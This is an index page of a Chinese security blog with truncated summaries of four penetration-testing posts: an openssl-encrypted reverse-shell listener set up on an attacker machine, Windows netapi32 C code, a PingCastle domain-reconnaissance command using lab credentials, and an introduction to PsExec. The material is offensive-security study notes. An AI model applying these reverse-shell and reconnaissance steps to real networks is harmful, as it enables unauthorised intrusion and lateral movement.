论安全萌新的自我修养

   :: 首页  :: 新随笔  :: 联系 :: 订阅 订阅  :: 管理

2021年1月6日

摘要: 加密Tcp反向 攻击机: openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes openssl s_server -quiet -key key.pem -cert cert.pem -po 阅读全文
posted @ 2021-01-06 17:26 Yangsir34 阅读(85) 评论(0) 推荐(0) 编辑

摘要: #ifndef UNICODE #define UNICODE #endif #pragma comment(lib, "netapi32.lib") #include <stdio.h> #include <assert.h> #include <windows.h> #include <lm.h 阅读全文
posted @ 2021-01-06 16:50 Yangsir34 阅读(275) 评论(0) 推荐(0) 编辑

摘要: 域外windows 一句话域内搜集 PingCastle.exe --server 192.168.3.142 --user 0day.org\jack --password admin!@#45 --protocol ADWSThenLDAP --healthcheck --explore-tru 阅读全文
posted @ 2021-01-06 13:56 Yangsir34 阅读(637) 评论(0) 推荐(0) 编辑

摘要: 简介 PsExec 是由 Mark Russinovich 创建的 Sysinternals Suite 中包含的工具。最初,它旨在作为系统管理员的便利工具,以便他们可以通过在远程主机上运行命令来执行维护任务。PsExec 可以算是一个轻量级的 telnet 替代工具,它使您无需手动安装客户端软件即 阅读全文
posted @ 2021-01-06 11:12 Yangsir34 阅读(407) 评论(0) 推荐(0) 编辑